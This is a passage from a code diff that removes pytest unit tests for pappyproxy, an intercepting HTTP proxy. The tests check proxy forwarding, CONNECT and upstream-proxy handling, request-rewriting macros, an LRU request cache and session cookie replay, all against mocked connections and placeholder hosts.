'hx5X1cGohHcVVzT4jIgUEU70vvYfNn8CTZm4oJ7qqRe/uQPUYy0rwvbd60oprtGg\n'
'jNv1H5R4ODHUMBXAI9H7ft9cWrd0fBQjxhoj8pvgJXEZ52flXSqQc7qHLg1wO/zC\n'
'RUgpTcNAb2qCssBKbj+c1vKEPRUJfw6UYb0s1462rQNc8BgZiKaNbwokFmkAnjUg\n'
'AvnX\n'
'-----END CERTIFICATE-----')
return (ca_key, private_key)
########
## Tests
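# The endpoint classes are presumably stubbed out elsewhere in the test setup
# to raise NotImplementedError on construction; this test just confirms that
# nothing here can open a real network connection.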
def test_no_tcp():
from twisted.internet.endpoints import SSL4ClientEndpoint, TCP4ClientEndpoint
from txsocksx.client import SOCKS5ClientEndpoint
from txsocksx.tls import TLSWrapClientEndpoint
with pytest.raises(NotImplementedError):
SSL4ClientEndpoint('aasdfasdf.sdfwerqwer')
with pytest.raises(NotImplementedError):
TCP4ClientEndpoint('aasdfasdf.sdfwerqwer')
with pytest.raises(NotImplementedError):
SOCKS5ClientEndpoint('aasdfasdf.sdfwerqwer')
with pytest.raises(NotImplementedError):
TLSWrapClientEndpoint('asdf.2341')
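# Typical shape of the proxy tests below, as a sketch (req_bytes is a
# placeholder for a raw HTTP request string):
#
#   proxy = TestProxyConnection()
#   proxy.setUp(mocker)
#   proxy.write_as_browser(req_bytes)
#   assert proxy.read_as_server() == req_bytes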
def test_proxy_server_connect(mocker):
proxy = TestProxyConnection()
proxy.setUp(mocker)
proxy.write_as_browser('CONNECT https://www.AAAA.BBBB:443 HTTP/1.1\r\n\r\n')
rsp = proxy.read_as_browser()
print(rsp)
assert rsp == 'HTTP/1.1 200 Connection established\r\n\r\n'
def test_proxy_server_forward_basic(mocker):
proxy = TestProxyConnection()
proxy.setUp(mocker)
req_contents = ('POST /fooo HTTP/1.1\r\n'
'Test-Header: foo\r\n'
'Content-Length: 4\r\n'
'Host: www.AAAA.BBBB\r\n'
'\r\n'
'ABCD')
rsp_contents = ('HTTP/1.1 200 OK\r\n\r\n')
proxy.write_as_browser(req_contents)
assert proxy.read_as_server() == req_contents
proxy.write_as_server(rsp_contents)
assert proxy.read_as_browser() == rsp_contents
proxy.get_endpoint.assert_called_with('www.AAAA.BBBB', 80, False, socks_config=None, use_http_proxy=True)
assert proxy.req_save.called
def test_proxy_server_forward_basic_ssl(mocker):
proxy = TestProxyConnection()
proxy.setUp(mocker)
proxy.perform_connect_request()
req_contents = ('POST /fooo HTTP/1.1\r\n'
'Test-Header: foo\r\n'
'Content-Length: 4\r\n'
'\r\n'
'ABCD')
rsp_contents = ('HTTP/1.1 200 OK\r\n\r\n')
proxy.write_as_browser(req_contents)
assert proxy.read_as_server() == req_contents
proxy.write_as_server(rsp_contents)
assert proxy.read_as_browser() == rsp_contents
assert proxy.req_save.called
proxy.get_endpoint.assert_called_with('www.AAAA.BBBB', 443, True, socks_config=None, use_http_proxy=True)
def test_proxy_server_connect_uri(mocker):
proxy = TestProxyConnection()
proxy.setUp(mocker)
proxy.write_as_browser('CONNECT https://www.AAAA.BBBB:443 HTTP/1.1\r\n\r\n')
proxy.read_as_browser()
req_contents = ('POST /fooo HTTP/1.1\r\n'
'Test-Header: foo\r\n'
'Content-Length: 4\r\n'
'\r\n'
'ABCD')
proxy.write_as_browser(req_contents)
assert proxy.client_protocol.transport.startTLS.called
assert proxy.client_factory.request.host == 'www.AAAA.BBBB'
assert proxy.client_factory.request.port == 443
assert proxy.client_factory.request.is_ssl == True
assert proxy.read_as_server() == req_contents
assert proxy.req_save.called
proxy.get_endpoint.assert_called_with('www.AAAA.BBBB', 443, True, socks_config=None, use_http_proxy=True)
def test_proxy_server_connect_uri_alt_port(mocker):
proxy = TestProxyConnection()
proxy.setUp(mocker)
proxy.write_as_browser('CONNECT https://www.AAAA.BBBB:80085 HTTP/1.1\r\n\r\n')
proxy.read_as_browser()
req_contents = ('POST /fooo HTTP/1.1\r\n'
'Test-Header: foo\r\n'
'Content-Length: 4\r\n'
'\r\n'
'ABCD')
proxy.write_as_browser(req_contents)
assert proxy.client_factory.request.host == 'www.AAAA.BBBB'
assert proxy.client_factory.request.port == 80085
assert proxy.client_factory.request.is_ssl == True
assert proxy.req_save.called
proxy.get_endpoint.assert_called_with('www.AAAA.BBBB', 80085, True, socks_config=None, use_http_proxy=True)
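# A configured SOCKS proxy should be passed through to get_endpoint untouched.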
def test_proxy_server_socks_basic(mocker):
proxy = TestProxyConnection()
proxy.setUp(mocker, socks_config={'host': 'www.banana.faketld', 'port': 1337})
proxy.write_as_browser('CONNECT https://www.AAAA.BBBB:80085 HTTP/1.1\r\n\r\n')
proxy.read_as_browser()
req_contents = ('POST /fooo HTTP/1.1\r\n'
'Test-Header: foo\r\n'
'Content-Length: 4\r\n'
'\r\n'
'ABCD')
proxy.write_as_browser(req_contents)
proxy.get_endpoint.assert_called_with('www.AAAA.BBBB', 80085, True,
socks_config={'host':'www.banana.faketld', 'port':1337},
use_http_proxy=True)
def test_proxy_server_http_basic(mocker):
proxy = TestProxyConnection()
proxy.setUp(mocker, http_config={'host': 'www.banana.faketld', 'port': 1337})
proxy.write_as_browser('CONNECT https://www.AAAA.BBBB:80085 HTTP/1.1\r\n\r\n')
proxy.read_as_browser()
req_contents = ('POST /fooo HTTP/1.1\r\n'
'Test-Header: foo\r\n'
'Content-Length: 4\r\n'
'\r\n'
'ABCD')
proxy.write_as_browser(req_contents)
assert proxy.req_save.called
proxy.get_endpoint.assert_called_with('www.AAAA.BBBB', 80085, True,
socks_config=None,
use_http_proxy=True)
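# Out-of-scope traffic should be neither saved nor routed through the
# upstream HTTP proxy.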
def test_proxy_server_360_noscope(mocker):
proxy = TestProxyConnection()
proxy.setUp(mocker, in_scope=False, socks_config={'host': 'www.banana.faketld', 'port': 1337})
proxy.write_as_browser('CONNECT https://www.AAAA.BBBB:80085 HTTP/1.1\r\n\r\n')
proxy.read_as_browser()
req_contents = ('POST /fooo HTTP/1.1\r\n'
'Test-Header: foo\r\n'
'Content-Length: 4\r\n'
'\r\n'
'ABCD')
proxy.write_as_browser(req_contents)
assert not proxy.req_save.called
proxy.get_endpoint.assert_called_with('www.AAAA.BBBB', 80085, True,
socks_config=None,
use_http_proxy=False)
def test_proxy_server_macro_simple(mocker):
proxy = TestProxyConnection()
new_req_contents = 'GET / HTTP/1.1\r\nMangled: Very yes\r\n\r\n'
new_rsp_contents = 'HTTP/1.1 200 OKILIE DOKILIE\r\nMangled: Very yes\r\n\r\n'
new_req = Request(new_req_contents)
new_rsp = Response(new_rsp_contents)
test_macro = InterceptMacroTest(new_req=new_req, new_rsp=new_rsp)
proxy.setUp(mocker, int_macros={'test_macro': test_macro})
proxy.write_as_browser('GET /serious.php HTTP/1.1\r\n\r\n')
assert proxy.read_as_server() == new_req_contents
proxy.write_as_server('HTTP/1.1 404 NOT FOUND\r\n\r\n')
assert proxy.read_as_browser() == new_rsp_contents
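# Intercepting macros apply in insertion order, so the second macro's
# mangled request/response is what actually hits the wire.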
def test_proxy_server_macro_multiple(mocker):
proxy = TestProxyConnection()
new_req_contents1 = 'GET / HTTP/1.1\r\nMangled: Very yes\r\n\r\n'
new_rsp_contents1 = 'HTTP/1.1 200 OKILIE DOKILIE\r\nMangled: Very yes\r\n\r\n'
new_req1 = Request(new_req_contents1)
new_rsp1 = Response(new_rsp_contents1)
new_req_contents2 = 'GET / HTTP/1.1\r\nMangled: Very very yes\r\n\r\n'
new_rsp_contents2 = 'HTTP/1.1 200 OKILIE DOKILIE\r\nMangled: Very very yes\r\n\r\n'
new_req2 = Request(new_req_contents2)
new_rsp2 = Response(new_rsp_contents2)
test_macro1 = InterceptMacroTest(new_req=new_req1, new_rsp=new_rsp1)
test_macro2 = InterceptMacroTest(new_req=new_req2, new_rsp=new_rsp2)
macros = collections.OrderedDict()
macros['macro1'] = test_macro1
macros['macro2'] = test_macro2
proxy.setUp(mocker, int_macros=macros)
proxy.write_as_browser('GET /serious.php HTTP/1.1\r\n\r\n')
assert proxy.read_as_server() == new_req_contents2
proxy.write_as_server('HTTP/1.1 404 NOT FOUND\r\n\r\n')
assert proxy.read_as_browser() == new_rsp_contents2
def test_proxy_server_macro_360_noscope(mocker):
proxy = TestProxyConnection()
new_req_contents = 'GET / HTTP/1.1\r\nMangled: Very yes\r\n\r\n'
new_rsp_contents = 'HTTP/1.1 200 OKILIE DOKILIE\r\nMangled: Very yes\r\n\r\n'
new_req = Request(new_req_contents)
new_rsp = Response(new_rsp_contents)
test_macro = InterceptMacroTest(new_req=new_req, new_rsp=new_rsp)
proxy.setUp(mocker, int_macros={'test_macro': test_macro}, in_scope=False)
proxy.write_as_browser('GET /serious.php HTTP/1.1\r\n\r\n')
assert proxy.read_as_server() == 'GET /serious.php HTTP/1.1\r\n\r\n'
proxy.write_as_server('HTTP/1.1 404 NOT FOUND\r\n\r\n')
assert proxy.read_as_browser() == 'HTTP/1.1 404 NOT FOUND\r\n\r\n'
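# With no macros active, response bytes should be streamed to the browser
# as they arrive rather than buffered.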
def test_proxy_server_stream_simple(mocker):
proxy = TestProxyConnection()
proxy.setUp(mocker)
req_contents = ('POST /fooo HTTP/1.1\r\n'
'Test-Header: foo\r\n'
'Content-Length: 4\r\n'
'Host: www.AAAA.BBBB\r\n'
'\r\n'
'ABCD')
rsp_contents = ('HTTP/1.1 200 OK\r\n\r\n')
proxy.write_as_browser(req_contents)
assert proxy.read_as_server() == req_contents
proxy.write_as_server(rsp_contents[:20])
assert proxy.read_as_browser() == rsp_contents[:20]
proxy.write_as_server(rsp_contents[20:])
assert proxy.read_as_browser() == rsp_contents[20:]
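# An active macro disables streaming: the browser sees nothing until the
# complete mangled response is available.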
def test_proxy_server_macro_stream(mocker):
proxy = TestProxyConnection()
new_req_contents = 'GET / HTTP/1.1\r\nMangled: Very yes\r\n\r\n'
new_rsp_contents = 'HTTP/1.1 200 OKILIE DOKILIE\r\nMangled: Very yes\r\n\r\n'
new_req = Request(new_req_contents)
new_rsp = Response(new_rsp_contents)
test_macro = InterceptMacroTest(new_req=new_req, new_rsp=new_rsp)
proxy.setUp(mocker, int_macros={'test_macro': test_macro})
proxy.write_as_browser('GET /serious.php HTTP/1.1\r\n\r\n')
assert proxy.read_as_server() == new_req_contents
proxy.write_as_server('HTTP/1.1 404 ')
assert proxy.read_as_browser() == ''
proxy.write_as_server('NOT FOUND\r\n\r\n')
assert proxy.read_as_browser() == new_rsp_contents
# Streaming is disabled whenever macros are active, even for out-of-scope
# connections, so this streaming variant stays disabled.
# def test_proxy_server_macro_stream_360_noscope(mocker):
# proxy = TestProxyConnection()
# new_req_contents = 'GET / HTTP/1.1\r\nMangled: Very yes\r\n\r\n'
# new_rsp_contents = 'HTTP/1.1 200 OKILIE DOKILIE\r\nMangled: Very yes\r\n\r\n'
# new_req = Request(new_req_contents)
# new_rsp = Response(new_rsp_contents)
# test_macro = InterceptMacroTest(new_req=new_req, new_rsp=new_rsp)
# proxy.setUp(mocker, int_macros={'test_macro': test_macro}, in_scope=False)
# proxy.write_as_browser('GET /serious.php HTTP/1.1\r\n\r\n')
# assert proxy.read_as_server() == 'GET /serious.php HTTP/1.1\r\n\r\n'
# proxy.write_as_server('HTTP/1.1 404 ')
# assert proxy.read_as_browser() == 'HTTP/1.1 404 '
# proxy.write_as_server('NOT FOUND\r\n\r\n')
# assert proxy.read_as_browser() == 'NOT FOUND\r\n\r\n'

View file

@@ -1,133 +0,0 @@
import pytest
from pappyproxy.requestcache import RequestCache, RequestCacheIterator
from pappyproxy.http import Request, Response, get_request
from pappyproxy.util import PappyException
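# Build n requests with sequential string reqids for exercising the cache.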
def gen_reqs(n):
ret = []
for i in range(1, n+1):
r = get_request('https://www.kdjasdasdi.sadfasdf')
r.headers['Test-Id'] = str(i)  # header values should be strings
r.reqid = str(i)
ret.append(r)
return ret
@pytest.inlineCallbacks
def test_cache_simple():
reqs = gen_reqs(5)
cache = RequestCache(5)
cache.add(reqs[0])
g = yield cache.get('1')
assert g == reqs[0]
def test_cache_evict():
reqs = gen_reqs(5)
cache = RequestCache(3)
cache.add(reqs[0])
cache.add(reqs[1])
cache.add(reqs[2])
cache.add(reqs[3])
assert not cache.check(reqs[0].reqid)
assert cache.check(reqs[1].reqid)
assert cache.check(reqs[2].reqid)
assert cache.check(reqs[3].reqid)
# Testing the implementation
assert reqs[0].reqid not in cache._cached_reqs
assert reqs[1].reqid in cache._cached_reqs
assert reqs[2].reqid in cache._cached_reqs
assert reqs[3].reqid in cache._cached_reqs
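# get() should count as a use, so reqs[0] is refreshed and reqs[1] becomes
# the least-recently-used entry evicted by the next add.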
@pytest.inlineCallbacks
def test_cache_lru():
reqs = gen_reqs(5)
cache = RequestCache(3)
cache.add(reqs[0])
cache.add(reqs[1])
cache.add(reqs[2])
yield cache.get(reqs[0].reqid)
cache.add(reqs[3])
assert cache.check(reqs[0].reqid)
assert not cache.check(reqs[1].reqid)
assert cache.check(reqs[2].reqid)
assert cache.check(reqs[3].reqid)
# Testing the implementation
assert reqs[0].reqid in cache._cached_reqs
assert reqs[1].reqid not in cache._cached_reqs
assert reqs[2].reqid in cache._cached_reqs
assert reqs[3].reqid in cache._cached_reqs
@pytest.inlineCallbacks
def test_cache_lru_add():
reqs = gen_reqs(5)
cache = RequestCache(3)
cache.add(reqs[0])
cache.add(reqs[1])
cache.add(reqs[2])
yield cache.add(reqs[0])
cache.add(reqs[3])
assert cache.check(reqs[0].reqid)
assert not cache.check(reqs[1].reqid)
assert cache.check(reqs[2].reqid)
assert cache.check(reqs[3].reqid)
# Testing the implementation
assert reqs[0].reqid in cache._cached_reqs
assert reqs[1].reqid not in cache._cached_reqs
assert reqs[2].reqid in cache._cached_reqs
assert reqs[3].reqid in cache._cached_reqs
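# Requests added without a reqid receive an in-memory id prefixed with 'm'
# and are also tracked in inmem_reqs, which keeps them alive even after
# cache eviction.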
@pytest.inlineCallbacks
def test_cache_inmem_simple():
cache = RequestCache(3)
req = gen_reqs(1)[0]
req.reqid = None
cache.add(req)
assert req.reqid[0] == 'm'
g = yield cache.get(req.reqid)
assert req == g
def test_cache_inmem_evict():
reqs = gen_reqs(5)
cache = RequestCache(3)
reqs[0].reqid = None
reqs[1].reqid = None
reqs[2].reqid = None
reqs[3].reqid = None
cache.add(reqs[0])
cache.add(reqs[1])
cache.add(reqs[2])
cache.add(reqs[3])
assert not cache.check(reqs[0].reqid)
assert cache.check(reqs[1].reqid)
assert cache.check(reqs[2].reqid)
assert cache.check(reqs[3].reqid)
# Testing the implementation
assert reqs[0] in cache.inmem_reqs
assert reqs[1] in cache.inmem_reqs
assert reqs[2] in cache.inmem_reqs
assert reqs[3] in cache.inmem_reqs
def test_req_ids():
reqs = gen_reqs(5)
cache = RequestCache(3)
cache.add(reqs[0])
cache.add(reqs[1])
cache.add(reqs[2])
cache.add(reqs[3])
assert cache.req_ids() == ['4', '3', '2', '1']
def test_req_ids_unmangled():
reqs = gen_reqs(5)
cache = RequestCache(3)
reqs[0].unmangled = reqs[4]
cache.add(reqs[0])
cache.add(reqs[4])
cache.add(reqs[1])
cache.add(reqs[2])
cache.add(reqs[3])
assert cache.req_ids() == ['4', '3', '2', '1']
assert cache.req_ids(include_unmangled=True) == ['4', '3', '2', '5', '1']

View file

@@ -1,119 +0,0 @@
import pytest
from pappyproxy.session import Session
from pappyproxy.http import Request, Response, ResponseCookie
@pytest.fixture
def req():
r = Request()
r.start_line = 'GET / HTTP/1.1'
return r
@pytest.fixture
def rsp():
r = Response()
r.start_line = 'HTTP/1.1 200 OK'
return r
def test_session_basic(req, rsp):
s = Session(
cookie_vals={'session':'foo'},
header_vals={'auth':'bar'},
)
assert 'session' not in req.cookies
assert 'session' not in rsp.cookies
assert 'auth' not in req.headers
assert 'auth' not in rsp.headers
s.apply_req(req)
s.apply_rsp(rsp)
assert req.cookies['session'] == 'foo'
assert rsp.cookies['session'].cookie_str == 'session=foo'
assert req.headers['auth'] == 'bar'
assert 'auth' not in rsp.headers
def test_session_cookieobj_basic(req, rsp):
s = Session(
cookie_vals={'session':ResponseCookie('session=foo; secure; httponly; path=/')},
header_vals={'auth':'bar'},
)
s.apply_req(req)
s.apply_rsp(rsp)
assert req.cookies['session'] == 'foo'
assert rsp.cookies['session'].key == 'session'
assert rsp.cookies['session'].val == 'foo'
assert rsp.cookies['session'].secure
assert rsp.cookies['session'].http_only
assert rsp.cookies['session'].path == '/'
assert req.headers['auth'] == 'bar'
assert 'auth' not in rsp.headers
def test_session_save_req(req):
req.headers['BasicAuth'] = 'asdfasdf'
req.headers['Host'] = 'www.myfavoritecolor.foobar'
req.cookies['session'] = 'foobar'
req.cookies['favorite_color'] = 'blue'
s = Session()
s.save_req(req, ['session'], ['BasicAuth'])
assert s.cookies == ['session']
assert s.headers == ['BasicAuth']
assert s.cookie_vals['session'].val == 'foobar'
assert s.header_vals['BasicAuth'] == 'asdfasdf'
assert 'Host' not in s.headers
assert 'favorite_color' not in s.cookies
def test_session_save_rsp(rsp):
rsp.headers['BasicAuth'] = 'asdfasdf'
rsp.headers['Host'] = 'www.myfavoritecolor.foobar'
rsp.set_cookie(ResponseCookie('session=foobar; secure; path=/'))
rsp.set_cookie(ResponseCookie('favorite_color=blue; secure; path=/'))
s = Session()
s.save_rsp(rsp, ['session'])
assert s.cookies == ['session']
assert s.headers == []
assert s.cookie_vals['session'].key == 'session'
assert s.cookie_vals['session'].val == 'foobar'
assert s.cookie_vals['session'].path == '/'
assert s.cookie_vals['session'].secure
def test_session_mixed(req, rsp):
s = Session(
cookie_names=['session', 'state'],
cookie_vals={'session':ResponseCookie('session=foo; secure; httponly; path=/')},
header_vals={'auth':'bar'},
)
s.apply_req(req)
s.apply_rsp(rsp)
assert req.cookies['session'] == 'foo'
assert rsp.cookies['session'].key == 'session'
assert rsp.cookies['session'].val == 'foo'
assert rsp.cookies['session'].secure
assert rsp.cookies['session'].http_only
assert rsp.cookies['session'].path == '/'
assert 'auth' not in rsp.headers
r = Response()
r.start_line = 'HTTP/1.1 200 OK'
r.set_cookie(ResponseCookie('state=bazzers'))
r.set_cookie(ResponseCookie('session=buzzers'))
s.save_rsp(r)
assert s.cookie_vals['session'].val == 'buzzers'
assert s.cookie_vals['state'].val == 'bazzers'
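# With save_all, every cookie on the response is captured, and apply_req
# then replays them onto a fresh request.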
def test_session_save_all(req, rsp):
s = Session()
rsp.set_cookie(ResponseCookie('state=bazzers'))
rsp.set_cookie(ResponseCookie('session=buzzers'))
s.save_rsp(rsp, save_all=True)
assert s.cookies == ['state', 'session']
assert 'state' not in req.cookies
assert 'session' not in req.cookies
s.apply_req(req)
assert req.cookies['state'] == 'bazzers'
assert req.cookies['session'] == 'buzzers'

Some files were not shown because too many files have changed in this diff.